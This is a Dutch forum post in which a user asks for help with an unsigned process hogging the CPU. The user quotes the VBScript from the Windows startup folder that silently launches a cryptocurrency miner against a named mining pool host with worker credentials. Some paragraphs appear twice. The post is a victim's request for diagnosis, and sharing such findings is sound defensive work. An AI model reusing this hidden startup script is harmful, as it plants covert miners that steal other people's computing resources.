Het viel me de laatste dagen op dat er een proces, mscfn.exe, constant de processor volledig belastte. Ik dacht eerst dat het onderdeel was van Windows Update maar het programma bleef maar draaien. Later bleek ook dat het programma niet was ondertekend.
Programma wordt gestart vanuit de map 'opstarten' met een Visual Basic-script:
Nu is er vrij weinig informatie te vinden hierover. VirusTotal heeft 6 hits. De URL die in het script staat verwijst naar een BitCoin-pool. Het bijbehorend account is al geblokkeerd. Is er een mogelijkheid om erachter te komen hoe dit op het systeem is terecht gekomen en weet iemand misschien of dit echt alleen een bitcoin-virus is?
Programma wordt gestart vanuit de map 'opstarten' met een Visual Basic-script:
VBScript:
1
| WScript.CreateObject( "WScript.Shell" ).Run "mscnf.exe --url http://eu-proxy.ecki.net:7332 --userpass wotan.4:x --quiet -r -1",0,0 |
Nu is er vrij weinig informatie te vinden hierover. VirusTotal heeft 6 hits. De URL die in het script staat verwijst naar een BitCoin-pool. Het bijbehorend account is al geblokkeerd. Is er een mogelijkheid om erachter te komen hoe dit op het systeem is terecht gekomen en weet iemand misschien of dit echt alleen een bitcoin-virus is?
If you hide your whole life, you'll forget who you even are. Uplay: TheWorstNL | Steam + Origin + PSN: The_Worst_NL